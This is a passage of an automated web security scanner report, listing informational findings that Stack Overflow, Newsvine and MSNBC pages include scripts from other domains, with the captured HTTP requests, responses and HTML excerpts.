</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

23.300. http://stackoverflow.com/questions/4843433/php-facebook-like-box-being-able-to-like-the-current-page-using-dynamic-url

Summary

Severity:   Information
Confidence:   Certain
Host:   http://stackoverflow.com
Path:   /questions/4843433/php-facebook-like-box-being-able-to-like-the-current-page-using-dynamic-url

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /questions/4843433/php-facebook-like-box-being-able-to-like-the-current-page-using-dynamic-url HTTP/1.1
Host: stackoverflow.com
Proxy-Connection: keep-alive
Referer: http://stackoverflow.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gauthed=1; __qca=P0-251589161-1296400348182; __utmz=140029553.1296400348.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=140029553.594979447.1296400348.1296400348.1296400348.1; __utmc=140029553; __utmb=140029553.1.10.1296400348

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=60
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 15:13:38 GMT
Last-Modified: Sun, 30 Jan 2011 15:12:38 GMT
Vary: *
Date: Sun, 30 Jan 2011 15:12:38 GMT
Content-Length: 32716


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>

<title>PHP: Facebook Like box - Being able to like the current page using dyna
...[SNIP]...
<link rel="search" type="application/opensearchdescription+xml" title="Stack Overflow" href="/opensearch.xml">
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script>
<script type="text/javascript" src="http://sstatic.net/js/master.min.js?v=e8eb0725b4bd"></script>
...[SNIP]...
<link rel="alternate" type="application/atom+xml" title="Feed for question 'PHP: Facebook Like box - Being able to like the current page using dynamic URL '" href="/feeds/question/4843433">

<script src="http://sstatic.net/js/question.js?v=46e26c3f9a63" type="text/javascript"></script>
...[SNIP]...
</h2>

<script src="http://sstatic.net/Js/wmd.js?v=508538fa9757" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

23.301. http://stackoverflow.com/tags

Summary

Severity:   Information
Confidence:   Certain
Host:   http://stackoverflow.com
Path:   /tags

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /tags HTTP/1.1
Host: stackoverflow.com
Proxy-Connection: keep-alive
Referer: http://stackoverflow.com/questions/4843433/php-facebook-like-box-being-able-to-like-the-current-page-using-dynamic-url
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gauthed=1; __qca=P0-251589161-1296400348182; __utmz=140029553.1296400348.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=140029553.594979447.1296400348.1296400348.1296400348.1; __utmc=140029553; __utmb=140029553.2.10.1296400348

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Sun, 30 Jan 2011 15:12:43 GMT
Content-Length: 25906


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>

<title>Tags - Stack Overflow</title>

<link rel="stylesheet" type="t
...[SNIP]...
<link rel="search" type="application/opensearchdescription+xml" title="Stack Overflow" href="/opensearch.xml">
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script>
<script type="text/javascript" src="http://sstatic.net/js/master.min.js?v=e8eb0725b4bd"></script>
...[SNIP]...
</script>

<script src="http://sstatic.net/Js/third-party/jquery.typewatch.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

23.302. http://stackoverflow.com/users

Summary

Severity:   Information
Confidence:   Certain
Host:   http://stackoverflow.com
Path:   /users

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /users HTTP/1.1
Host: stackoverflow.com
Proxy-Connection: keep-alive
Referer: http://stackoverflow.com/tags
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gauthed=1; __qca=P0-251589161-1296400348182; __utmz=140029553.1296400348.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=140029553.594979447.1296400348.1296400348.1296400348.1; __utmc=140029553; __utmb=140029553.3.10.1296400348

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Sun, 30 Jan 2011 15:12:47 GMT
Content-Length: 39001


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>

<title>Users - Stack Overflow</title>

<link rel="stylesheet" type="
...[SNIP]...
<link rel="search" type="application/opensearchdescription+xml" title="Stack Overflow" href="/opensearch.xml">
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script>
<script type="text/javascript" src="http://sstatic.net/js/master.min.js?v=e8eb0725b4bd"></script>
...[SNIP]...
</script>

<script src="http://sstatic.net/Js/third-party/jquery.typewatch.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

23.303. http://stackoverflow.com/users/login

Summary

Severity:   Information
Confidence:   Certain
Host:   http://stackoverflow.com
Path:   /users/login

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /users/login?returnurl=%2fusers HTTP/1.1
Host: stackoverflow.com
Proxy-Connection: keep-alive
Referer: http://stackoverflow.com/users
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gauthed=1; __qca=P0-251589161-1296400348182; __utmz=140029553.1296400348.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=140029553.594979447.1296400348.1296400348.1296400348.1; __utmc=140029553; __utmb=140029553.4.10.1296400348

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Set-Cookie: gauthed=; expires=Sat, 29-Jan-2011 15:12:49 GMT; path=/
Date: Sun, 30 Jan 2011 15:12:49 GMT
Content-Length: 14133


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>

<title>Log In - Stack Overflow</title>

<link rel="stylesheet" type=
...[SNIP]...
<link rel="search" type="application/opensearchdescription+xml" title="Stack Overflow" href="/opensearch.xml">
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script>
<script type="text/javascript" src="http://sstatic.net/js/master.min.js?v=e8eb0725b4bd"></script>
...[SNIP]...
<link rel="stylesheet" href="http://sstatic.net/openid.css?v=3">
<script type="text/javascript" src="http://sstatic.net/Js/third-party/openid-jquery.js?v=7"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

23.304. http://suzanne-choney.newsvine.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://suzanne-choney.newsvine.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: suzanne-choney.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:19:28 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=6046a552d588b2b1ca9c2098d0a526d4; expires=Sat, 25-Jan-2031 02:19:28 GMT; path=/; domain=.newsvine.com
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 79989

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...

23.305. http://technolog.msnbc.redacted/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:29:15 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 143969

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
ink class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/fa8e2c7b4e481656a284f68469c7f35eb684a538.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/4b72ffbf6297f1aa19aeb8e208daeb363e6e05cd.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/5e374218b458bef20a9b343255be99bcb1dc1c08.js?v=23247"></script>
...[SNIP]...
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/technolog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div id="vine-inlineCode__5942398" class="inlineCode photo_align_block" data-contentid="5942398"><script src="http://player.ooyala.com/player.js?embedCode=d0MGgwMjrtm0rSeX9bTc29IpE0zQQ1Rj&height=354&deepLinkEmbedCode=d0MGgwMjrtm0rSeX9bTc29IpE0zQQ1Rj&width=630"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...

23.306. http://technolog.msnbc.redacted/_feeds/rss2/author

Summary

Severity:   Information
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /_feeds/rss2/author

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /_feeds/rss2/author HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Last-Modified: Fri, 28 Jan 2011 23:34:03 +0000
Content-Type: text/xml; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:29:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 174921

<?xml version="1.0" encoding="utf-8"?><rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:thr="http://purl.org/syndication/thread/1.0" xmlns:activity="http://activitystrea.ms/spec/1.0
...[SNIP]...
<div id="vine-inlineCode__5942398" class="inlineCode photo_align_block" data-contentid="5942398"><script src="http://player.ooyala.com/player.js?embedCode=d0MGgwMjrtm0rSeX9bTc29IpE0zQQ1Rj&height=354&deepLinkEmbedCode=d0MGgwMjrtm0rSeX9bTc29IpE0zQQ1Rj&width=630"></script>
...[SNIP]...

23.307. http://technolog.msnbc.redacted/_news/2010/08/10/4864065-motorolas-pumped-up-droid-2-ships-thursday

Summary

Severity:   Information
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /_news/2010/08/10/4864065-motorolas-pumped-up-droid-2-ships-thursday

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /_news/2010/08/10/4864065-motorolas-pumped-up-droid-2-ships-thursday HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:28:55 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 55869

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog - Motorola's pu
...[SNIP]...
ink class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/39f49614ef57bfa39918e852b69f13f139a7e311.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/9d030b901f826a71aa88c354332b97d68143daaf.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/3184fbf3a1cea536a06ab9ecdadcc3b45c540e59.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/9d96c8b3032770da5152df3c93298ef8d7e4320a.js?v=23247"></script>
...[SNIP]...
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/technolog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...

23.308. http://technolog.msnbc.redacted/_news/2010/08/16/4904611-north-korea-welcome-to-twitter

Summary

Severity:   Information
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /_news/2010/08/16/4904611-north-korea-welcome-to-twitter

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /_news/2010/08/16/4904611-north-korea-welcome-to-twitter HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:27:55 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 53206

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog - North Korea,
...[SNIP]...
ink class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/39f49614ef57bfa39918e852b69f13f139a7e311.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/9d030b901f826a71aa88c354332b97d68143daaf.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/3184fbf3a1cea536a06ab9ecdadcc3b45c540e59.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/9d96c8b3032770da5152df3c93298ef8d7e4320a.js?v=23247"></script>
...[SNIP]...
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/technolog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...

23.309. http://technolog.msnbc.redacted/_news/2010/08/19/4932582-cameron-diaz-most-dangerous-celeb-search-name

Summary

Severity:   Information
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /_news/2010/08/19/4932582-cameron-diaz-most-dangerous-celeb-search-name

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /_news/2010/08/19/4932582-cameron-diaz-most-dangerous-celeb-search-name HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:25:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 57347

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog - Cameron Diaz
...[SNIP]...
ink class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
